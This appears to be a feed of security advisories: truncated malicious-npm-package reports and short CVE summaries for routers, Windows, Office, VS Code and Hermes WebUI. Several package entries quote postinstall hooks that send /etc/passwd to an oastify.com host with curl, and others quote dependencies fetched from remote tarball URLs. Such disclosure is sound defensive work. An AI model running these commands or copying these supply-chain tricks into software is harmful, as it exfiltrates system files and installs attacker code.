MAL-2026-5453 Malicious code in tivo-codelib-a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c187e845e4c0d637709021a287c758e0206cb7adc46517391df4724d8af8cb7 [email protected] is an empty-stub npm package whose index.js exports module.exports = and whose package metadata description, author is blank. I...

CGA-669Q-XGHX-M5FF

Bulletin has no description...

Malicious code in @webda-infra/search (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1d3966598d25bae6a0824df09461ccbea8ad8ff22be2b3b93eab681cc733ff73 @webda-infra/[email protected] is a near-empty placeholder index.js is empty, module.exports = whose package.json declares a single dependency, ltidisafe...

MAL-2026-5451 Malicious code in privacy-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969 [email protected] is a hollow wrapper index.js is module.exports = , blank description, blank author whose sole runtime dependency is declared as a...

Malicious code in privacy-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969 [email protected] is a hollow wrapper index.js is module.exports = , blank description, blank author whose sole runtime dependency is declared as a...

MAL-2026-5438 Malicious code in corporate-front-vue (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d26a235f294aacb3800465f89db0f33ecb54f09da450ee98543f8b039249fc12 [email protected] is a near-empty shim index.js exports an empty object whose only meaningful content is a tarball-URL dependency declared i...

MAL-2026-5448 Malicious code in mazemap (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0 package.json declares its only dependency ltidisafe as a direct HTTPS tarball URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz...

MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

MAL-2026-5428 Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

MAL-2026-5430 Malicious code in @sourceflow-uk/sourceflow-tracker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c5bcccc37c380ce54f5bfc2bc2311fbefb6ebc3400a397cbc4afc2188fb3c11d package.json declares a dependency ltidisafe whose version specifier is the raw URL https://storage.googleapis.com/lscunpentest/packuxfoundry.tgz — a...

CVE-2026-9213

A vulnerability in the affected NETGEAR gaming routers allows attackers with the ability to intercept and tamper with traffic between the router and the Internet, to execute code on the device...

CVE-2026-49959

Hermes WebUI before version 0.51.311 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by placing malicious executable Git configuration in a workspace repository's .git/config file. Attackers can exploit Git subprocess invocations in...

CVE-2026-48574

Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally...

CVE-2026-48569

Improper input validation in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally...

CVE-2026-48563

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47652

Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally...

CVE-2026-47653

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47654

Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network...

CVE-2026-47643

External control of file name or path in Azure Stack Edge allows an unauthorized attacker to execute code over a network...

CVE-2026-47635

Access of resource using incompatible type 'type confusion' in Microsoft Office allows an unauthorized attacker to execute code locally...